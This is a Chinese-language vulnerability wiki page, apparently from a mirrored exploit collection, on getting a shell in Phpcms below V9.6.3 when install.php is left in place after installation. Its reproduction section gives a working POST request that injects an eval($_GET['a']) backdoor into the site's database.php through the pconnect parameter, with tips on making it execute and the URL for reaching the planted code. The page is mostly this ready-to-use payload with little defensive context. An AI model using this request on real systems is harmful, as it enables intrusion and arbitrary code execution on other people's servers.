menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right Phpcms chevron_right Phpcms V9.6.3 install.php 没有即使删除导致的getshell.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Phpcms V9.6.3 install.php 没有即使删除导致的getshell.md
    1022 B / 2021-04-21 09:23:46
        Phpcms V9.6.3 install.php 没有即使删除导致的getshell
====================================================

一、漏洞简介
------------

比较鸡肋,需要在环境安装好了之后,install.php也没有被删除,才可以利用

二、漏洞影响
------------

Phpcms \< V9.6.3

三、复现过程
------------

    POST /install/install.php?step=installmodule
    module=admin&dbport=3306&pconnect=eval($_GET["a"])

> 这里控制的是
> pconnect参数,因为默认它没有单引号比较好调试。注意这里如果不传dbport参数的话database.php里的port参数会置空,将会报错。就无法执行到后面的
> eval了

![1.png](./resource/PhpcmsV9.6.3install.php没有即使删除导致的getshell/media/rId24.png)

被修改后的database.php:

![2.png](./resource/PhpcmsV9.6.3install.php没有即使删除导致的getshell/media/rId25.png)

url:`/caches/configs/database.php`

![3.png](./resource/PhpcmsV9.6.3install.php没有即使删除导致的getshell/media/rId26.png)
    links
    file_download